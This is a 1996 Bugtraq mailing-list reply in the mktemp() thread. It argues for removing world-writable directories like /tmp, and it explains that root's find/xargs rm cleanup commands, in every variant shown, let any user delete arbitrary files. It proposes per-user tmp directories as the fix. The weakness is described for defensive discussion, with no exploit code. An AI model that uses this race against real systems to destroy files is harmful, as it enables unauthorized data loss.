[3860] in bugtraq
Re: mktemp() and friends
daemon@ATHENA.MIT.EDU (D. J. Bernstein)
Tue Dec 24 20:27:53 1996
Date: Tue, 24 Dec 1996 22:52:49 -0000
Reply-To: "D. J. Bernstein" <djb@koobera.math.uic.edu>
From: "D. J. Bernstein" <djb@koobera.math.uic.edu>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>
I have a very simple suggestion: eliminate world writability. No more
/var/spool/mail and no more /tmp.
Right now, system security is in the hands of thousands of programs.
That's silly. The only programs that should have to worry about security
are programs that handle untrusted data---i.e., communications programs.
> /tmp has the advantage that it may be cleaned up after a reboot.
What does ``reboot'' mean? Sounds like a Windows feature.
Under UNIX, people want to clean up temporary files in multiuser mode.
How would you suggest doing this?
Everyone knows that if root runs
find /tmp ... -print | xargs rm
then any user can delete any file on the system. Years ago I proposed
find -print0 and xargs -0, naively assuming that reliable => secure.
Unfortunately, if root runs
find /tmp ... -print0 | xargs -0 rm
any user can _still_ delete any file on the system. You might give up
on xargs and run
find /tmp ... -exec rm '{}' ';'
but that _still_ lets any user delete any file on the system.
With per-user tmp directories, the problem disappears: setuid to joe and
remove old files in ~joe/tmp.
> Finally, what if you're using an NFS-mounted ~
Each user should have a separate storage area on each host. Otherwise:
setenv TMPDIR ~/tmp/`hostname`; mkdir $TMPDIR
---Dan
Put an end to unauthorized mail relaying. http://pobox.com/~djb/qmail.html
